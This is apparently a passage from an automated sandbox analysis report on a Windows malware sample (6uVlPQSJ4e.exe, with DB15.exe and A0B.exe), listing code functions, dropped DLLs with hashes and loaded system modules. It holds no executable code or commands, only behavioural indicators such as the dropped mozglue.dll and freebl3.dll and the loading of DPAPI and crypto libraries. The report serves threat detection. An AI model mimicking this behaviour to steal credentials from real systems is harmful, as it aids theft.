            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050CD6017_2_0050CD60
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040BDC017_2_0040BDC0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050CDF017_2_0050CDF0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00409DFA17_2_00409DFA
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050CE5817_2_0050CE58
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0042CE5117_2_0042CE51
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00406EE017_2_00406EE0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00409F7617_2_00409F76
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00420F3017_2_00420F30
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050CF2817_2_0050CF28
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050CFC017_2_0050CFC0
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00449FE317_2_00449FE3
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0050CF9017_2_0050CF90
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 00428C81 appears 37 times
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 02898EC0 appears 57 times
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 004547A0 appears 33 times
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 0042F7C0 appears 75 times
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 0044F23E appears 55 times
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 00428520 appears 67 times
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 00454E50 appears 36 times
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: String function: 028A0160 appears 50 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 00428C81 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 02898EC0 appears 57 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 004547A0 appears 75 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 0042F7C0 appears 99 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 0044F23E appears 53 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 00428520 appears 77 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 00454E50 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: String function: 028A0160 appears 50 times
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 10520
            Source: 6uVlPQSJ4e.exe, 00000000.00000002.2120090897.0000000000AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWell2 vs 6uVlPQSJ4e.exe
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratSection loaded: msvcr100.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: drprov.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ntlanman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: davclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: davhlpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: taskschd.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: drprov.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: winsta.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: ntlanman.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: davclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: davhlpr.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: wkscli.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: cscapi.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: browcli.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: netapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: wtsapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: webio.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
